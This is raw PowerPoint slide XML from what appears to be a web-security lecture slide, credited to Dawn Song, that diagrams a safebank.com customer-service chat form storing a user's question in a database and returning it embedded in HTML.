            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId21" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275823" y="2287509"/>
              <a:ext cx="111252" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="73" name="object 73"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId22" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="317155" y="2295348"/>
              <a:ext cx="176944" cy="85037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="object 74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612717" y="815171"/>
            <a:ext cx="6147647" cy="672706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16087" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="127"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-460" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>chat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>customer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>associate.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="object 80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740682" y="5752200"/>
            <a:ext cx="3364653" cy="1079783"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stores</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>database.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="6773" algn="r">
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>awn</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ng</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="object 81"/>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75" name="object 75"/>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7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User asks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-520"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76" name="object 76"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a loan?”)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="object 77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9685260"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78" name="object 78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="63625" y="3662791"/>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79" name="object 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4778587" y="2538306"/>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13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Associate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7"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245717"/>
            <a:ext cx="3605107" cy="3371427"/>
            <a:chOff x="6209088" y="934288"/>
            <a:chExt cx="2703830" cy="252857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052068" y="940473"/>
              <a:ext cx="683679" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7712913" y="944714"/>
              <a:ext cx="1157358" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7674864" y="1062228"/>
              <a:ext cx="1237475" cy="729992"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>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10" name="object 10"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2298960" y="3503062"/>
            <a:ext cx="5149427" cy="1983740"/>
            <a:chOff x="1724220" y="2627296"/>
            <a:chExt cx="3862070" cy="1487805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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13" name="object 13"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762756" y="3096107"/>
              <a:ext cx="3707129" cy="1000125"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3707129" h="1000125">
                  <a:moveTo>
                    <a:pt x="3706710" y="999642"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38099">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="object 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1762757" y="3061491"/>
              <a:ext cx="128270" cy="128905"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="128269" h="128905">
                  <a:moveTo>
                    <a:pt x="92989" y="128752"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="34607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127711" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864186" y="5078306"/>
            <a:ext cx="2220807" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773" algn="just">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>returns </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>embedded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>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8" name="object 18"/>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9" name="object 19"/>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20" name="object 20"/>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21" name="object 21"/>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22" name="object 22"/>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23" name="object 23"/>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24" name="object 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10253472" y="1487408"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="7690103" y="1115555"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8430762" y="1115555"/>
              <a:ext cx="458723" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 26"/>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27" name="object 27"/>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28" name="object 28"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8638022" y="1246644"/>
              <a:ext cx="251456" cy="158483"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7690103" y="1344167"/>
              <a:ext cx="1207007" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>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31" name="object 31"/>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2" name="object 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10396371" y="1552587"/>
            <a:ext cx="1458807" cy="220133"/>
            <a:chOff x="7797278" y="1164440"/>
            <a:chExt cx="1094105" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8432292" y="1178039"/>
              <a:ext cx="458718" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 34"/>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5" name="object 35"/>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6" name="object 36"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7797278" y="1164440"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>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38" name="object 38"/>
          <p:cNvGrpSpPr/>
